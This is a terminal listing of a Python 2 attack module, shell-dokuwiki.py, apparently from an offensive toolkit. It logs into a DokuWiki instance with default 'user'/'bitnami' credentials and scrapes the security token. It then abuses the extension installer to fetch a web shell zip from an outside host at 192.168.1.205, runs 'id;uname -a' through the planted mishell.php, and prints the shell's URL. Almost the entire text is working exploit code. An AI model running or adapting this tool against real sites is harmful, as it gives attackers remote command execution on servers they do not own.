c@kali:~/src/napalm2.2/modules$ cat shell-dokuwiki.py #!/usr/bin/env python # shell-dokuwiki.py - module to upload shell, based on previous version # created 28.04.2017. Bug ('feature') is exploitable only # when you will have a valid credentials. # for this proof-of-concept you'll also need host with you.r/shell.zip # import sys import re import requests print '[+] Module : dokuwiki - started.' print target = raw_input("[+] Hostname> ") logMe = target + '/doku.php?id=start&do=login&sectok=' print session = requests.session() login_data = dict(u='user', p='bitnami') req = session.post(logMe, data=login_data) # 2nd req: afterPage = target + '/doku.php?id=start&do=admin&page=extension&tab=install' req2 = session.get(afterPage) resp = req2.text if 'Log Out' in resp: print '[+] We are logged-in as admin. Preparing shell...' req3 = session.get(afterPage) resp3 = req3.text pattern = re.compile('<input type="hidden" name="sectok" value="(.*?)"/>') found = re.search(pattern, resp3) if found: sectok = found.group(1) print '[+] Found "sectok":' + str( sectok ) print '[+] Preparing shell params to upload' data_shell = { 'sectok':sectok, 'installurl':'http://192.168.1.205/mishell.zip' } reqshell = session.post(afterPage, data=data_shell) respshell = reqshell.text md5name = re.compile('<div class="success">Plugin (.*?) installed successfully</div>') foundmishell = re.search(md5name, respshell) if foundmishell: print '[+] Mishell name:' + str( foundmishell.group(1)) shellUrl = target + '/lib/plugins/'+foundmishell.group(1)+'/mishell.php?x=id;uname -a' verify = session.get(shellUrl) vtext = verify.text print ' ',vtext print '' print '[+] Your shell should be here:', shellUrl ## can not log in else: print '[-] Can not login. Something is wrong :C' print '[+] Module : dokuwiki - finished.'